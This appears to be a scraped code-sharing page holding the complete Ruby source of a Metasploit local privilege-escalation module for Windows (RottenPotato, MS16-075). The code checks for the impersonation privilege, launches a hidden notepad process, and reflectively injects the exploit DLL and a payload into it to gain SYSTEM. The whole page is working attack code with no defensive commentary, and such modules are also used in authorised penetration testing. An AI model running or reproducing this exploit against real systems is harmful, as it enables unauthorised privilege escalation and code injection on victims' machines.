扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/windows/reflective_dll_injection' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', 'Description'=> %q( Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. ), 'License'=> MSF_LICENSE, 'Author' => [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'none', 'WfsDelay' => '20' }, 'Targets'=> [ ['Automatic', {}], ['Windows x86', { 'Arch' => ARCH_X86 }], ['Windows x64', { 'Arch' => ARCH_X64 }] ], 'Payload' => { 'DisableNops' => true }, 'References'=> [ ['MSB', 'MS16-075'], ['CVE', '2016-3225'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget'=> 0 })) end def assign_target if target.name == 'Automatic' case sysinfo["Architecture"] when 'x86' vprint_status("Found we are on an x86 target") my_target = targets[1] when 'x64' vprint_status("Found we are on an x64 target") my_target = targets[2] else fail_with(Failure::NoTarget, "Unable to determine target") end else my_target = target end return my_target end def verify_arch(my_target) if my_target["Arch"] != sysinfo["Architecture"] print_error("Assigned Target Arch = #{my_target.opts['Arch']}") print_error("Actual Target Arch = #{sysinfo['Architecture']}") fail_with(Failure::BadConfig, "Assigned Arch does not match reality") end if client.arch != sysinfo["Architecture"] fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported") else vprint_good("Current payload and target Arch match....") end end def check privs = client.sys.config.getprivs if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end my_target = assign_target print_status("#{my_target['Arch']}") verify_arch(my_target) if check == Exploit::CheckCode::Safe fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege') end if my_target.opts['Arch'] == 'x64' dll_file_name = 'rottenpotato.x64.dll' vprint_status("Assigning payload rottenpotato.x64.dll") elsif my_target.opts['Arch'] == 'x86' dll_file_name = 'rottenpotato.x86.dll' vprint_status("Assigning payload rottenpotato.x86.dll") else fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code") end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end |
体验盒子
